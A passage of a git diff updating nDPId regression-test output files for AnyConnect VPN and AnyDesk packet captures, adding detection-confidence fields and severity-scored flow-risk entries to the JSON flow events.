+00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00166{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","total-events-serialized":397}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 3001/2997
@@ -403,10 +403,10 @@
 ~~ total active/idle flows...: 69/69
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4829982 bytes
-~~ total memory freed........: 4829982 bytes
-~~ total allocations/frees...: 102809/102809
+~~ total memory allocated....: 4891959 bytes
+~~ total memory freed........: 4891959 bytes
+~~ total allocations/frees...: 104399/104399
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 171 chars
-~~ json string max len.......: 1323 chars
-~~ json string avg len.......: 815 chars
+~~ json string max len.......: 1590 chars
+~~ json string avg len.......: 948 chars
diff --git a/test/results/anydesk-2.pcap.out b/test/results/anydesk-2.pcap.out
index dc616093d..53e0b4428 100644
--- a/test/results/anydesk-2.pcap.out
+++ b/test/results/anydesk-2.pcap.out
@@ -1,26 +1,26 @@
 00441{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"anydesk-2.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585247,"flow_last_seen":1613977585247,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1613977585247,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1613977585247,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1613977585247,"pkt":"EBMx8Tl22MuK4S0uCABFAABM5C0AAIARAADAqAG7wKgBAeh3ADUAOIRW7CIBAAABAAAAAAAADnJlbGF5LTMxODVhODQ3A25ldAdhbnlkZXNrA2NvbQAAAQAB"}
-00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585247,"flow_last_seen":1613977585247,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1613977585247,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-3185a847.net.anydesk.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585247,"flow_last_seen":1613977585247,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1613977585247,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-3185a847.net.anydesk.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1613977585260,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":1613977585260,"pkt":"2MuK4S0uEBMx8Tl2CABFAABcjnRAADkRLxDAqAEBwKgBuwA16HcASAAA7CKBgAABAAEAAAAADnJlbGF5LTMxODVhODQ3A25ldAdhbnlkZXNrA2NvbQAAAQABwAwAAQABAADSNAAEJT3fDw=="}
-00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613977585247,"flow_last_seen":1613977585260,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1613977585260,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-3185a847.net.anydesk.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"37.61.223.15"}}
+00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613977585247,"flow_last_seen":1613977585260,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1613977585260,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-3185a847.net.anydesk.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"37.61.223.15"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585542,"flow_last_seen":1613977585542,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1613977585542,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1613977585542,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1613977585542,"pkt":"EBMx8Tl22MuK4S0uCABFAABM5C4AAIARAADAqAG7wKgBAdhQADUAOIRW6okBAAABAAAAAAAADnJlbGF5LTliNjgyN2YyA25ldAdhbnlkZXNrA2NvbQAAAQAB"}
-00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585542,"flow_last_seen":1613977585542,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1613977585542,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-9b6827f2.net.anydesk.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585542,"flow_last_seen":1613977585542,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1613977585542,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-9b6827f2.net.anydesk.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1613977585553,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":1613977585553,"pkt":"2MuK4S0uEBMx8Tl2CABFAABcBhBAADkRt3TAqAEBwKgBuwA12FAASAAA6omBgAABAAEAAAAADnJlbGF5LTliNjgyN2YyA25ldAdhbnlkZXNrA2NvbQAAAQABwAwAAQABAABtXAAEisckcw=="}
-00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613977585542,"flow_last_seen":1613977585553,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1613977585553,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-9b6827f2.net.anydesk.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"138.199.36.115"}}
+00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613977585542,"flow_last_seen":1613977585553,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1613977585553,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-9b6827f2.net.anydesk.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"138.199.36.115"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977595379,"flow_last_seen":1613977595379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1613977595379,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1613977595379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1613977595379,"pkt":"KDc3AG3I2MuK4S0uCABFAAA0dDNAAIAGAADAqAG7wKgBstOUG56PGHtIAAAAAIAC+vCE5AAAAgQFtAEDAwgBAQQC"}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1613977595380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1613977595380,"pkt":"2MuK4S0uKDc3AG3ICABFAAA0AABAAEAGtgbAqAGywKgBuxue05RZw\/OWjxh7SYAS\/\/+kVwAAAgQFtAEDAwUEAgAA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1613977595380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1613977595380,"pkt":"KDc3AG3I2MuK4S0uCABFAAAodDRAAIAGAADAqAG7wKgBstOUG56PGHtJWcPzl1AQBAKE2AAA"}
-00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595379,"flow_last_seen":1613977595380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1613977595380,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01144{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1613977595379,"flow_last_seen":1613977595391,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1705,"flow_avg_l4_payload_len":243,"midstream":0,"ts_msec":1613977595391,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing","30":"Desktop\/File Sharing Session"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"ee644a8a34c434abca4b737ec1d9efad","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"F8:4E:27:4E:F9:33:35:2F:1A:69:71:D5:02:6B:B8:72:EF:B7:BA:B0"}}
+01170{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595379,"flow_last_seen":1613977595380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1613977595380,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01495{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1613977595379,"flow_last_seen":1613977595391,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1705,"flow_avg_l4_payload_len":243,"midstream":0,"ts_msec":1613977595391,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"ee644a8a34c434abca4b737ec1d9efad","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"F8:4E:27:4E:F9:33:35:2F:1A:69:71:D5:02:6B:B8:72:EF:B7:BA:B0"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977595407,"flow_last_seen":1613977595407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1613977595407,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1613977595407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1613977595407,"pkt":"2MuK4S0uKDc3AG3ICABFAABAAABAAEAGtfrAqAGywKgBu8tHG54tLA3cAAAAALAC\/\/97PgAAAgQFtAEDAwUBAQgKHE34xQAAAAAEAgAA"}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1613977595407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1613977595407,"pkt":"KDc3AG3I2MuK4S0uCABFAAA0dDlAAIAGAADAqAG7wKgBshuey0dV\/SLKLSwN3YAS\/\/+E5AAAAgQFtAEDAwgBAQQC"}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1613977595407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1613977595407,"pkt":"2MuK4S0uKDc3AG3ICABFAAAoAABAAEAGthLAqAGywKgBu8tHG54tLA3dVf0iy1AQIABwXwAAAAAAAAAA"}
-00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595407,"flow_last_seen":1613977595408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1613977595408,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01161{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1613977595407,"flow_last_seen":1613977595549,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":813,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":179,"midstream":0,"ts_msec":1613977595549,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","8":"Weak TLS cipher","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing","30":"Desktop\/File Sharing Session"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"4b505adfb4a921c5a3a39d293b0811e1","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"86:4F:2A:9F:24:71:FD:0D:6A:35:56:AC:D8:7B:3A:19:E8:03:CA:2E"}}
+01171{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595407,"flow_last_seen":1613977595408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1613977595408,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01593{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1613977595407,"flow_last_seen":1613977595549,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":813,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":179,"midstream":0,"ts_msec":1613977595549,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"4b505adfb4a921c5a3a39d293b0811e1","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"86:4F:2A:9F:24:71:FD:0D:6A:35:56:AC:D8:7B:3A:19:E8:03:CA:2E"}}
